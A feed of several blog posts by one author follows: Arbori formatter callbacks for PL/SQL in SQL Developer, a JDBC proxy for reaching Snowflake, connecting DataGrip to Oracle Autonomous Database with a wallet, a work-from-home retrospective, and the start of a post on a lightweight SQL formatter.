The formatting result has an additional empty line on line 2.

rightAlignments

This function expects a node in tuple. It calculates the length in characters of the passed node. If it is less than 6 (the length of the SELECT keyword), then the missing spaces are added to newLinePositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename AS emp_name,
    sal AS salary
      FROM emp
     WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added two spaces before the FROM on line 6 and one space before the WHERE on line 7. However, the query block is not yet right-aligned. This will happen in incrementalAlignments.

paddedIdsInScope

This function expects a scope, predecessor and follower in tuple. It populates the following fields:

  • maxLengthInScope of type Map<String, Integer>, where the key is an interval representation of a scope (containing to and from position) and the value the calculated max length
  • id2scope of type Map<Integer, String>, where the key is the start position of a follower node and the value an interval representation of a scope (containing to and from position)
  • id2interval of type Map<Integer, Integer>, where the key is the start position of a follower node and the value the start position of a predecessor node
  • id2adjustments of type Map<Integer, Integer>, where the key is the start position of a follower node and the value is the indentation

The newLinePositions field is read but not written. As a result, the position of paddedIdsInScope in the Arbori program is important.

The serializer adds the necessary number of spaces between the predecessor and follower nodes to left-align followers within the scope.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
    sal    AS salary
      FROM emp
     WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added one space before the AS on line 4 and two spaces before the AS on line 5. However, the result looks wrong because ename and sal are not yet left-aligned. This will happen in pairwiseAlignments.

incrementalAlignments

This function expects a node in tuple. It adds spaces to all children with a content in newLinePositions to left-align them with the start position in node.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
              sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added ten spaces at the beginning of line 5, 6 and 7. As a result SELECT, sal,   FROM and WHERE are now left-aligned. Please note that the algorithm considers the spaces added in rightAlignments.

pairwiseAlignments

This function expects a node and a predecessor in tuple. It left-aligns the node with its predecessor by adding spaces to newLinePositions for the start position of node.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;

pairwiseAlignments:
  [predecessor) select_list & [node) select_term & [node-1) ',' & predecessor=node-1-1 
  ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added seven spaces at the beginning of line 5. Now all select terms are left-aligned.

ignoreLineBreaksBeforeNode

This function expects a node in tuple. It removes the entry in newLinePositions for the start position of node. As a result the serializer will emit a space before this node.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;

pairwiseAlignments:
  [predecessor) select_list & [node) select_term & [node-1) ',' & predecessor=node-1-1 
  ->
;

ignoreLineBreaksBeforeNode:
   [node) pls_expr & [node-1) 'IF' /* override breaks in indentedNodes */
   ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatting result does not contain a newline after the IF on line 9.

ignoreLineBreaksAfterNode

This function expects a node in tuple. It is similar to ignoreLineBreaksBeforeNode. The only difference is that it removes the end position of a node from newLinePositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;

brkX2:
  [node) sql_statement
  ->
;

rightAlignments:
    [node) 'FROM'
  | [node) 'WHERE'
  ->
;

paddedIdsInScope:
  [id) expr & [id^) select_term & [id+1) as_alias & [scope) select_clause
            & scope < id & predecessor = id & follower = id+1
  ->
;

incrementalAlignments:  
  [node) subquery
  ->
;

pairwiseAlignments:
  [predecessor) select_list & [node) select_term & [node-1) ',' & predecessor=node-1-1 
  ->
;

ignoreLineBreaksBeforeNode:
   [node) pls_expr & [node-1) 'IF' /* override breaks in indentedNodes */
   ->
;

ignoreLineBreaksAfterNode:
   [node) pls_expr & [node+1) 'THEN' /* override breaks set in indentedNodes */
   ->
;


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF r.salary > 2.9e3 THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

This is the final result using every callback function. The formatting result does not contain a newline before the THEN on line 9 anymore. Everything looks good now.

Summary

There are simpler ways to produce the final formatting result. However, the goal was to show the impact of every callback function. While the final Arbori program in this blog post produces a reasonable good formatted code, it is far from complete.

If you are interested in alternative formatter settings then I suggest to have a look at this GitHub repository.

The post Formatter Callback Functions appeared first on Philipp Salvisberg's Blog.

Accessing Snowflake from SQL Developer

$
0
0

My first day of work this year was a training day. As a participant in a “Snowflake Fundamentals” training course. I opted for the four-day, multi-week option so that I would have time to better absorb what I had just learned. Tomorrow is my third day and I plan to write more about Snowflake once I complete this training.

The Problem

As a long-time Oracle SQL Developer user, I tried to connect to Snowflake via SQL Developer. SQL Developer supports the following database systems via third-party JDBC drivers:

  • TimesTen
  • Amazon Redshift
  • Cloud
  • DB2
  • Hive
  • JDBC
  • MongoDB
  • MySQL
  • PostgreSQL
  • SQLServer
  • Sybase
  • Teradata

The generic “JDBC” variant sounds promising. Why is this option not shown when creating a new connection? Because this driver requires the JDBC-ODBC bridge (as does the Microsoft ACCESS driver, by the way, which is not available in non-Windows environments). SQL Developer requires JDK 8 since version 4.1. And JDK 8 does not include the JDBC-ODBC-Bridge anymore.

But wait. In SQL Developer Data Modeler (SDDM) there is a generic JDBC driver that can connect to any database system. Kent Graziano described in this blog post how to configure it for Snowflake. And Federico Sicilia explained in this blog post how to deal with Snowflake specific data types. However, SDDM accesses the database exclusively via JDBC’s DatabaseMetaData interface. That’s why a generic JDBC driver is applicable in SDDM. On the other side, SQL Developer uses mainly SQL statements, and as a result the generic JDBC driver used in SDDM is not sufficient for the use in SQL Developer. Of course, Oracle could implement the support of such a driver, but since the access to third party database systems is provided in the context of data migrations only, this has not a high priority.

Briefly: no generic JDBC driver, no support for Snowflake’s JDBC driver in SQL Developer.

Options?

What are the alternatives? Use other tools such as Snowflake’s web UI worksheets, the CLI snowsql or a third party IDE that supports Snowflake. For example DBeaver or JetBrain’s DataGrip. These options work well and are recommended.

However, if you still want to access Snowflake from SQL Developer then I see basically two options:

  1. Write an extension that provides an additional connect panel (combobox entry) in SQL Developer
  2. Write a JDBC proxy that acts like a supported driver, e.g. MySQL

The first option is the most user-friendly one. In theory. In practice it will be difficult to make it work, because third party extensions need a UI action (e.g. own button, own menu item) to initialize the load of the extension. At least for the very first time. Once it is loaded it is cached. This makes it not that user friendly anymore, because there is no additional action the user has to trigger. I dealt with bugs in this area in other SQL Developer extensions. So I know what I’m talking about. Unless you want to introduce a dummy action, this approach is a dead end.

The second option sounds easy. SQL Developer allows to add third party JDBC drivers. So let’s do that.

The Solution

As almost always, it was more work than anticipated. In the end I have successfully implemented a JDBC proxy which is mimicking a MySQL driver and delegates requests to a configurable target JDBC driver. The target JDBC driver can be Snowflake, PostgreSQL, SQLite, H2 or MySQL. Adding more database systems should not be that difficult, as long as the JDBC driver is available on Maven Central.

I released this driver as an OpenSource project. The README.md on GitHub explains how it works and how to install it. Hence I’m not going to repeat that in this blog post. You can download this driver from here.

An Example

I like to use the tables DEPT and EMP to demonstrate things. Everyone in the Oracle field knows them. And therefore no lengthy or distracting introduction is necessary. Let’s create these tables in Snowflake:

CREATE TABLE dept (
   deptno   NUMERIC(2)   CONSTRAINT pk_dept PRIMARY KEY,
   dname    VARCHAR(14)  NOT NULL,
   loc      VARCHAR(13)  NOT NULL 
);

INSERT INTO dept VALUES 
   (10, 'ACCOUNTING', 'NEW YORK'),
   (20, 'RESEARCH',   'DALLAS'),
   (30, 'SALES',      'CHICAGO'),
   (40, 'OPERATIONS', 'BOSTON');

CREATE TABLE emp (
   empno    NUMERIC(4)     CONSTRAINT pk_emp PRIMARY KEY,
   ename    VARCHAR(10)    NOT NULL,
   job      VARCHAR(9)     NOT NULL,
   mgr      NUMERIC(4),
   hiredate DATE           NOT NULL,
   sal      NUMERIC(7,2)   NOT NULL,
   comm     NUMERIC(7,2),
   deptno   NUMERIC(2)     CONSTRAINT fk_deptno REFERENCES dept,
   CONSTRAINT fk_mgr FOREIGN KEY (mgr) REFERENCES emp
);

INSERT INTO emp VALUES 
   (7839, 'KING',   'PRESIDENT', NULL, DATE '1981-11-17', 5000, NULL, 10),
   (7698, 'BLAKE',  'MANAGER',   7839, DATE '1981-05-01', 2850, NULL, 30),
   (7499, 'ALLEN',  'SALESMAN',  7698, DATE '1981-02-20', 1600, 300,  30),
   (7900, 'JAMES',  'CLERK',     7698, DATE '1981-12-03', 950,  NULL, 30),
   (7654, 'MARTIN', 'SALESMAN',  7698, DATE '1981-09-28', 1250, 1400, 30),
   (7844, 'TURNER', 'SALESMAN',  7698, DATE '1981-09-08', 1500, 0,    30),
   (7521, 'WARD',   'SALESMAN',  7698, DATE '1981-02-22', 1250, 500,  30),
   (7782, 'CLARK',  'MANAGER',   7839, DATE '1981-06-09', 2450, NULL, 10),
   (7934, 'MILLER', 'CLERK',     7782, DATE '1982-01-23', 1300, NULL, 10),
   (7566, 'JONES',  'MANAGER',   7839, DATE '1981-04-02', 2975, NULL, 20),
   (7902, 'FORD',   'ANALYST',   7566, DATE '1981-12-03', 3000, NULL, 20),
   (7369, 'SMITH',  'CLERK',     7902, DATE '1980-12-17', 800,  NULL, 20),
   (7788, 'SCOTT',  'ANALYST',   7566, DATE '1987-04-19', 3000, NULL, 20),
   (7876, 'ADAMS',  'CLERK',     7788, DATE '1987-05-23', 1100, NULL, 20);

The result in SQL Developer looks as follows:

SQL Developer does not understand this multi-row INSERT statement. That’s why you see this pink wavy line on line 8. Nevertheless SQL Developer can execute these statements. That’s excellent.

Now, let’s show the newly created tables in the Connections window and some details for table DEPT. I like SQL Developer’s integration of SDDM and the ability to create an ad-hoc model. Here it is:

From my point of view there is no reason to avoid integrity constraints. Even if they are not enforced by the database system, they still help the user to better understand the model. In this model you see that MGR is a foreign key column and it is optional. That’s nice.

Summary

The implementation of a JDBC proxy driver for accessing Snowflake from SQL Developer started as an experiment. The result works amazingly well. As a side effect, I can now access my SQLite and H2 databases from SQL Developer as well. Other IDEs, however, offer more database-specific features. Anyway, the ability to access multiple database systems from SQL Developer has some value. At least for me.

What do you think of it? Is this useful or just another unnecessary feature? Please post your thoughts below. Thanks.

The post Accessing Snowflake from SQL Developer appeared first on Philipp Salvisberg's Blog.

Connecting via JDBC to the Oracle Cloud

$
0
0

You can connect to an Oracle Autonomous Database in different ways. This is well documented here. It’s a bit different from what we know from on-premises environments. In this blog post, I show the steps to connect to an Autonomous Database from a third-party IDE like DataGrip.

From a JDBC perspective, this is just an ordinary JDBC URL with some driver-specific properties. Therefore, this approach should work for any JDBC-based IDE and also for any Java application.

Step 1 – Download the Wallet

Go to your Autonomous Database and click on the “DB Connection” button. A screen similar to the following appears:

Press on the “Download Wallet” button and enter a password. This password is used to protect the key and the trust store. We will need it later. I named my instance “ATP21”. Therefore, in my case, a zip archive named “Wallet_ATP21.zip” was downloaded.

Step 2 – Unzip the Wallet

Unzip the downloaded zip file and move it to a location where want to keep it. The wallet contains the following files:

  • README
  • ewallet.p12
  • ojdbc.properties
  • tnsnames.ora
  • cwallet.sso
  • keystore.jks
  • sqlnet.ora
  • truststore.jks

Open the file “tnsnames.ora” in a text editor. It contains 5 entries. We need one of those entries to build the JDBC connection string. I highlighted the relevant part of the first entry in the next screenshot:

Step 3a – Configure Connection in DataGrip (Legacy Driver)

Add a new connection in DataGrip and select “Oracle” as shown in the following screenshot:

0

In the “General” tab change the Connection type to “URL only”. Enter the user, the password and the complete JDBC URL as shown in the next screenshot:

The URL starts with jdbc.oracle:thin:@. The rest is the text I’ve highlighted in the tnsnames.ora file above.

Then click on the “Advanced” tab and define the following properties:
  • javax.net.ssl.trustStore
  • javax.net.ssl.trustStorePassword
  • javax.net.ssl.keyStore
  • javax.net.ssl.keyStorePassword

Here are my settings (of course you need to amend the values to match the environment of your wallet):

Step 3b – Configure Connection in DataGrip (Current Driver)

DataGrip is automatically downloading the latest Oracle Database JDBC driver. In my case version 21.1.0.0. Since version 18.3 there is an easier way to connect. The JDBC driver can access the wallet directory and its files. As a result you do not need to configure the java.net.ssl.* JDBC properties anymore. You just have to define one additional JDBC property “TNS_ADMIN” to define the path to the wallet directory.

And of course you can pass this JDBC property directly in the JDBC URL as shown in the next screenshot:

Conclusion

Establishing a connection to an Autonomous Database requires a wallet. The JDBC driver needs access to this wallet. This doesn’t make things easier, but it doesn’t make them overly complicated either.

However, you need to deal with this additional resource on a regular basis because the wallet has a limited lifetime. This is documented in the README file.

Wallet Expiry Date
-----------------------
This wallet was downloaded on 2021-02-28 08:16:36.267 UTC.
The SSL certificates provided in this wallet will expire on 2023-03-19 21:43:22.0 UTC.
In order to avoid any service interruptions due to an expired SSL certificate, you must re-download the wallet before this date.

So I have to update my wallet in two years otherwise I won’t be able to connect anymore.

The post Connecting via JDBC to the Oracle Cloud appeared first on Philipp Salvisberg's Blog.

Work From Home – First Anniversary

$
0
0

The last time I was on-site at a customer was March 10, 2020. I usually spent about 20-40% of my time working from home. But working exclusively from home is something completely different. A new experience. After a year it’s time for a brief personal retrospection.

The Good

More at Home

Pretty obvious. I know. Anyhow, I’m spending more time with my wife. She also works from home, at least most of the time. It’s good to see that we get along well and spending more time together doesn’t become a problem. And I don’t miss dinners with her because I want to finish some task at work or avoid traffic jam or both.

The Children Are Grown Up

Our boys are 29 and 27 years old. Both are healthy. Our older son changed his career path and is working part-time while studying computer science. Overall he is doing quite well. It’s not that easy for our younger son who is a producer, musician and DJ. Berlin was a perfect place for his career. However, the party scene is pretty dead at the moment. However, we as parents are happy to help were we can. When I hear about the problems other parents have with their younger children, pupering teenagers and the school, then I’d say we can be really happy. Proud parents, for sure.

Better Mood

I spend much more time with our dog. I believe that my mood is generally better when he’s around. When I grab a fresh cup of coffee he demands his strokes or he can persuade me to play with him. Anyway he always makes me smile.

Upgraded Workplace

I improved my workplace at home. Here’s a list of some gadgets I ordered during this time:

Due to supply bottlenecks, I’m still waiting for some of these gadgets to be delivered. However, my workplace at home is now better than everything I ever had at a customer site or at one of my employer’s workplaces.

Ready for Virtual Meetings

During working hours, I am always ready to have a video call. Microsoft Teams is open all the time. Establishing a call and sharing the screen has never been easier. In the past, I’ve joined the meeting a few minutes early because more often than not, I’ve run into a problem. Video, audio, or both. Maybe because I rarely used these tools and only launched them when needed. As a result, I was either early or late (restarts always take longer than you expect). These days I dial in on time, and technical problems are the exception. It’s almost as stable and easy as making a phone call. I also like that almost everyone has their webcam enabled. It makes the conversations more personal and makes communication better.

Better Virtual Meetings

In my experience, the fewer people participating in a video call, the better the call. For reviews or pair programming I find the video calls even more efficient than physical meetings. Giving access to input devices happen in a much more controlled way. Grabbing the mouse or the keyboard does not work. You have to ask and wait for the other person to accept your request. I also find some Scrum rituals better in the virtual form. Tools such as Miro help to improve collaboration in a way which I never experienced in a physical meeting. Working in parallel on a board works surprisingly well. I experienced that we are much faster and all team members are aware what others have written. A lot happens in parallel. Sorting and grouping while adding sticky notes. Better results in less time.

I participated at various mixtures of physical and virtual meetings. Typically most of the people met physically in a specially equipped room where some few others joined virtually. I call the persons in the same room first class participants. The others are second class participants. Why? They are not equally present at the meeting and they miss a lot of non-verbal communication. If audio and video is badly configured some persons cannot be heard and sometimes you never get a video stream of the talking person. A pure virtual meeting makes us all second class participants. All participants are equal from a technical point of view. For the former first class participants the meeting experience degraded. For all others it improved, a lot.

New Skill

I never felt comfortable with webinars. When I present, I need to feel the audience to get an immediate feedback. The audience help me to adapt during the talk. Go faster, go slower or ask questions. This does not work in webinars. In the last year I had the chance to present at various virtual events. I think I’m getting better. For one event I pre-recorded two talks which was very instructive. I completely underestimated the time required for such a task. For one talk I spent more than 12 hours to record 45 minutes. At that point I just decided that the result is good enough. However, I developed a new skill. And that’s good.

So if you would ask me to do a webinar now, I might say yes.

The Bad

Lack of Informal Information Exchange

When I work at the customer site there are a lot of unplanned interactions. At my desk. Near my desk. At the coffee corner. After a meeting. During lunch. These are informal meetings or events. Where we exchange business or non-business related information. They happen more or less unplanned. When everyone is working from home these kind of information exchange does not happen. The virtual coffee or lunch meetings are no suitable replacements. Why? Because when we meet physically we discuss things in groups. Persons interested join. Persons uninterested leave and join another group. So there are several bubbles. And certain information is exchanged between two persons only. A virtual coffee meeting using Zoom, Teams or similar cannot work this way. In the end it is unsatisfying for everyone. As a result I stopped joining these meetings.

After a year I think I feel the missing information. Scheduling virtual meetings does not help, because you cannot connect to the persons while they are in the “right” mood. And there is no way to check without starting a conversation.

This is bothering me because I did not found a good alternative yet.

Less Social Interactions

That, too, is somehow obvious. A consequence of isolation. Some people need more social interactions than others. I’m one of those who can live with fewer social contacts. However, almost none is too few even for me. I’m very lucky that I don’t live alone. So I am complaining on a very high level.

Blurred Boundaries Between Business and Private Life

Everything is accessible via my MacBook. Some things even via my iPhone. So it’s easy to switch between business and personal work. This is nothing new, but since I work 100% from home, I’ve had to introduce some additional rules to make sure business doesn’t creep into personal life and vice versa. I’m not super successful in this area. It’s a risk. Constant monitoring and control is necessary. In my view, the recipe for success is not to be controlled by others.

No Physical Meetings

The more sensitive a topic, the more important a physical meeting is. Why? Because we communicate on different levels. The spoken words. The tone of the voice. Other sounds or even smells. And last but not least the body language. In my opinion, body language accounts for more than 50%.

I believe that I can feel the mood of the persons in a room to a certain extend. Without special effort. I get these impressions intuitively. It’s just there. However, in a virtual room I do not trust my impression and often I do not get a good one, even if all persons have enabled their video feed. Maybe it’s just a matter of practice. Nevertheless, the face is what we see in a video stream and never the whole body. I think I miss legs, feet, arms and hands. Maybe also some sound. I don’t know. Furthermore in some situation persons hide their video stream. For a short moment or even a longer periods. This is not possible in a physical meeting.

Technology might help in the future, but right now we have to live with the capabilities of the current technologies.

No Physical Conferences

I mentioned earlier that I like to give a talk in front of a real audience. A virtual setup is better than nothing, but not more. At a conference, there are a variety of opportunities to connect with people you know and people you don’t know. It’s natural. It’s the way we are used to interact. It is often the basis for future (virtual) collaboration.

However, I think there will be room for virtual or hybrid conferences in the future. As a result, there will be fewer physical conferences. The remaining physical conferences must offer clear added value beyond that of their virtual counterparts.

Vacation at Home

Every year since I started to work we take three consecutive weeks for vacation. We spend the time out of home. For me it doesn’t matter where. The most important thing is a change of scene. Apart from that, nowadays I’m happy with a comfortable armchair where I can read some books. This year we had to spend the vacation at home. I was only partially successful in breaking the routine. As a result the vacation was not that refreshing as in previous years. We have planned this year to spend three weeks in a very nice house at the Baltic Sea. However, I suspect that we will have to spend this vacation at home again. This gives me a chance to improve.

No Commute

When working at a customer site I spend typically two hours commuting. At first I thought that working from home with a commute from the kitchen to my study would be a good thing. It surely is from an environmental perspective. And I clearly do not miss the traffic jam. However, sitting with the hot coffee at my desk feels like a cold start. I’m not ready for work yet.

Driving from home to the office was like a “fade in”. While listening to my favorite radio station with news, music and jokes I thought about what work I had to do at the office. When I arrived I was ready for work. I knew exactly what I wanted to start with.

It was similar on the way home. Like a “fade out”. I left the office after finishing some unit of work. In my car I listened to the music while driving and enjoying being alone. When I arrived at home I was really there and was interested to hear about my wife’s day. Nowadays it’s more like an interruption of work. Not a real closure. It’s like my mind and my body are not at the same place. And guess who is figuring that out every single day?

It sounds strange, but I miss commuting.

4 Kilograms

That’s the weight I gained during this time. The temptations at home are simply too strong. I guess I need to start working on my self-control.

Conclusion

When I look at the list, I feel pretty privileged. I still have a job. I like my work. My family is healthy so far. I have no real reason to complain.

The post Work From Home – First Anniversary appeared first on Philipp Salvisberg's Blog.


Lightweight Formatter for PL/SQL & SQL

$
0
0

TL;DR

Bye bye heavyweight formatter. Long live the lightweight formatter. Are you using Oracle’s SQL Developer or SQLcl? Then install these settings and press Ctrl-F7 to produce code that conforms to the Trivadis PL/SQL & SQL Coding Style. A compromise between conformity and individuality.

Heavyweight Formatter

A typical PL/SQL & SQL formatter replaces whitespace between lexical tokens by default with a single space. A whitespace consists of a series of spaces, tabs and line breaks. As a result the original whitespace between the tokens is lost. The grammars for SQL*Plus, PL/SQL and SQL are huge. As a consequence, a single space is not the desired result in many cases. Therefore, a formatter comes with a large set of rules and options to override the default (single space between tokens).

A key feature of a heavyweight formatter is that it produces the same result regardless of how the original code was formatted. There is no room for individuality unless it is part of a rule and its configuration. This makes a complete formatter a heavyweight.

Here is a create view example. Once formatted with spaces between the tokens and once with line breaks between the tokens.

create view v as select empno , ename from emp ;

create 
view 
v 
as 
select 
empno
, 
ename 
from 
emp
;

Here are the formatter results for some popular integrated development environments for PL/SQL & SQL. I configured the tools with these settings based on the Trivadis PL/SQL & SQL Coding Style. For SQL Developer I loaded only the .xml file and used the default custom formatting rules (Arbori program).


create view v as
   select empno,
          ename
     from emp;

create view v as
   select empno,
          ename
     from emp;


select empno, ename
  from emp;

select empno, ename
  from emp;

Allround Automations PL/SQL Developer cannot parse create view statements. Therefore I formatted just the subquery part of the view.

create view v
as
   select empno, ename from emp;

create view v
as
   select empno, ename from emp;

All tools produced the same result for both variants of the statement. However, the result differs between the tools, although the configuration is based on the same code style. Why is that so? Let’s look at the code style to answer this question.

Trivadis Formatting Rules

The Trivadis PL/SQL & SQL Coding Guidelines contains the following rules for code formatting in the Code Style chapter:

  1. Keywords and names are written in lowercase
  2. 3 space indention.
  3. One command per line.
  4. Keywords loop, else, elsif, end if, when on a new line.
  5. Commas in front of separated elements.
  6. Call parameters aligned, operators aligned, values aligned.
  7. SQL keywords are right aligned within a SQL command.
  8. Within a program unit only line comments — are used.
  9. Brackets are used when needed or when helpful to clarify a construct.

When you go through the list, you find out that only rule 5 has been violated. However, this violation was intentional. I use trailing commas whenever I’m allowed to and therefore I changed the default. A privilege of the maintainer. You like leading commas? No problem. You can configure whatever you want in the preferences of SQL Developer.

The point is, all rules are vaguely worded and leave a lot of room for interpretation. Furthermore, rule 1, 8 and 9 are about code style, but not about formatting of code. Code formatting should be exclusively about whitespace between tokens. Extending the scope can be dangerous and break the code, e.g. when using JSON dot notation, which uses case-sensitive identifiers.

These rules are a good starting point for a developer who knows PL/SQL & SQL. However, they leave a lot of freedom when configuring a formatter. And they are for sure not suitable as a specification for a formatter.

Lightweight Formatter

A lightweight formatter preserves whitespace between lexical tokens by default. Based on a set of rules and options, the whitespace between tokens are then fixed. This allows the lightweight formatter to produce a reasonable result with a small set of rules.

Let’s compare a minimalistic heavyweight and lightweight formatter. Both formatter do not implement any rules. The formatter just returns the default whitespace between tokens.

Here’s the formatter input based on an example from the SQL Language Reference:

CREATE TABLESPACE auto_seg_ts DATAFILE 'file_2.dbf' SIZE 1M
   EXTENT MANAGEMENT LOCAL
   SEGMENT SPACE MANAGEMENT AUTO;

The minimalistic heavyweight formatter produces this result:

create tablespace auto_seg_ts datafile 'file_2.dbf' size 1 M extent management local segment space management auto ;

And the minimalistic lightweight formatter produces this result:

create tablespace auto_seg_ts datafile 'file_2.dbf' size 1M
   extent management local
   segment space management auto;

Both formatter changed the case of the keywords and preserved the case of the identifiers. The heavyweight formatter placed a single space between each lexical token, while the lightweight formatter preserved the whitespace. The result of the lightweight formatter looks good because the input was formatted reasonably.

Advantages of a Lightweight Formatter

I’m pretty sure that there are no formal formatting rules for a create tablespace statement. As a developer I write and read very seldom such statements. The formatting of this code is not that important for me. Both formatter outputs are acceptable, even if I like the second one better. However, when the create tablespace statement contains several file_specification clauses then some line breaks would indeed help to improve the readability.

For me it is completely okay to preserve the original format for a lot of statements such as create tablespace, create database, create user, etc.

However I’d like to format code within the following SQL statements:

  • create function
  • create package
  • create package body
  • create procedure
  • create trigger
  • create type
  • create type body
  • create view
  • delete
  • insert
  • merge
  • select
  • update

